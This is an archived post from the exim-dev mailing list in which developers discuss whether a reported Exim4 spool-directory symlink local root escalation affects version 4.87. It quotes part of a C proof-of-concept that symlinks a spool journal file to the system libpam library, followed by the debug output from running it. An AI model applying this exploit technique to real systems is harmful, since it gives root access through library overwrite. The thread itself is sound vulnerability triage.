Re: [exim-dev] Exim4 spool directory symlink local root esca…

Top Page
This message is part of the following thread:
Mthe complete thread tree sorted by date
MJeremy Harris at <-
MHeiko Schlittermann at ->
Delete this message
Reply to this message
Author: Andreas Metzler
Date:  
To: exim-dev
Subject: Re: [exim-dev] Exim4 spool directory symlink local root escalation - does this apply to 4.87?
On 2016-09-11 Jeremy Harris <jgh@???> wrote:
> On 11/09/16 17:16, Andreas Metzler wrote:
> >> And... is that
> >> repeat-by relying on the writability of a library directory
> >> by an unpriv process?
> >
> > /lib/x86_64-linux-gnu/ is 0755 root:root.

> In that case I'm not seeing how this stage works:

> - Symlink /var/spool/exim4/input/xxxxxx-xxxxxx-xx-J to
> /lib/x86_64-linux-gnu/libpam.so.0.83.1

> Perhaps I'm not understanding "to". What is the "ls -l" output for
> the symlink just created? 

    strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J");
    dirStruct=opendir("/var/spool/exim4/msglog");
    assert(dirStruct);
    result=1;
    while(result) {
      while((dirEnt=readdir(dirStruct))) {
        if(*dirEnt->d_name=='.') continue;
// Be fast, perhaps aligned word copy needed. Pray to 23 in demo.
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
        strncpy(linkPath+23, dirEnt->d_name, 16);
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
        result=symlink(TARGET_PATH, linkPath);
system ("ls -l /var/spool/exim4/input/ /lib/x86_64-linux-gnu/libpam.so.0.83.1");
        assert(!result);
        fprintf(stderr, "Relinked %s\n", linkPath);
        break;


... 

$ /tmp/EximUpgrade --Upgrade
-rw-r--r-- 1 root        root        60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1


/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root        root        60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1


/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim  19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
-rw-r--r-- 1 root        root        60104 May 18 00:22 /lib/x86_64-linux-gnu/libpam.so.0.83.1


/var/spool/exim4/input/:
total 8
-rw-r----- 1 Debian-exim Debian-exim 19 Sep 11 17:20 1bj8R0-0004c9-JG-D
-rw-r----- 1 Debian-exim Debian-exim 617 Sep 11 17:20 1bj8R0-0004c9-JG-H
lrwxrwxrwx 1 Debian-exim Debian-exim 38 Sep 11 17:20 1bj8R0-0004c9-JG-J -> /lib/x86_64-linux-gnu/libpam.so.0.83.1
Relinked /var/spool/exim4/input/1bj8R0-0004c9-JG-J
Target ready for writing
EximUpgrade: EximUpgrade-debugme.c:163: main: Assertion `result==newStatData.st_size' failed.
Aborted

cu Andreas
--
`What a good friend you are to him, Dr. Maturin. His other friends are
so grateful to you.'
`I sew his ears on from time to time, sure'

This message was posted to the following mailing lists:
Exim-dev
Mailing List Info | Nearby Messages		<-Re: [exim-dev] Exim4 spool directory symlink local root escalation - does this apply to 4.87?Re: [exim-dev] Exim4 spool directory symlink local root escalation - does this apply to 4.87?->
Tahini and Hummus and Cumin Development Archives administrated by cumin AdminsLurker (version 2.3)